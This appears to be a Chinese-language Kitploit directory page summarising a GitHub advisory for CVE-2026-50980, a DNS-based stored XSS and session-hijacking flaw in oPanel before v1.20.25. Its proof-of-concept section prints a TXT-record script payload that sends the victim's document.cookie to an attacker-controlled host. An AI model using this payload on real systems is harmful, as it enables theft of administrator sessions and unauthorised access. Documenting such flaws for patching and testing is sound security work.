Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-50980 — oPanel 基于DNS的跨站脚本(XSS)与会话劫持 | Kitploit
工具/GitHubGitHub/bugresearch/cve-2026-50980
漏洞分析漏洞利用Web应用程序漏洞利用Web安全DNS 分析
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel 基于DNS的跨站脚本(XSS)与会话劫持

查看仓库
1个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-50980:基于 DNS 的跨站脚本攻击(XSS)及会话劫持(oPanel)

概述

  • CVE ID: CVE-2026-50980
  • 产品: oPanel
  • 受影响版本: < v1.20.25
  • 漏洞类型: 通过 DNS 实现存储型跨站脚本攻击(XSS)/ 会话劫持
  • 严重性: 高(CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

描述

oPanel(版本低于 v1.20.25)中存在一个跨站脚本(XSS)漏洞,原因是其对 DNS 响应的处理与净化不当。当面板执行 DNS 查询(例如获取域名信息、检查 DNS 传播或查询 TXT 记录)通向攻击者控制的域名服务器时,会将返回的 DNS 记录直接反映到 Web 界面中,且未进行充分的 HTML 编码。

攻击者可以通过配置一个恶意 DNS 服务器,使其对 TXT 记录查询返回恶意 JavaScript 有效载荷来利用此漏洞。当经过身份验证的 oPanel 用户(如管理员)查看显示 DNS 响应的页面时,该有效载荷会在其浏览器会话的上下文中执行。

影响

成功利用该漏洞可允许攻击者在受害者浏览器中执行任意 JavaScript。正如概念验证所展示的,这可用于窃取敏感的身份验证 cookies(document.cookie),从而导致完全会话劫持及对 oPanel 环境的未授权管理访问。

概念验证(PoC)

利用此漏洞需要攻击者设置一个恶意 DNS 服务器和一个 HTTP 监听器来捕获被泄露的数据。

1. 攻击者基础设施搭建

攻击者运行一个在 UDP 53 端口上的恶意 DNS 服务器,该服务器配置为对任何 TXT 查询返回包含 XSS 有效载荷的响应。

恶意 TXT 记录有效载荷:

root@kitploit:~
<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
下载工具